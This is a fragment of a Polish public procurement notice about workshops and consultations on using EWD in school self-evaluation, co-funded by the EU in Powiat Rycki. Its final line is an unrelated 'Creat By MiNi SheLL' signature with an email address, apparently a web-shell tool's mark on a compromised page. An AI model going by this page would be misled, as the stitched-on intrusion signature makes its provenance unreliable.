<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia - Przeprowadzenie warsztatów oraz konsultacji grupowych i indywidualnych w zadaniu Wykorzystanie EWD w ewaluacji wewnętrznej szkoły realizowany jest w ramach projektu pn. Kompleksowe wspomaganie szkół i przedszkoli w Powiecie Ryckim współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet III. Wysoka jakość systemu oświaty, Działanie 3.5. Kompleksowe wspomaganie rozwoju szkół.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com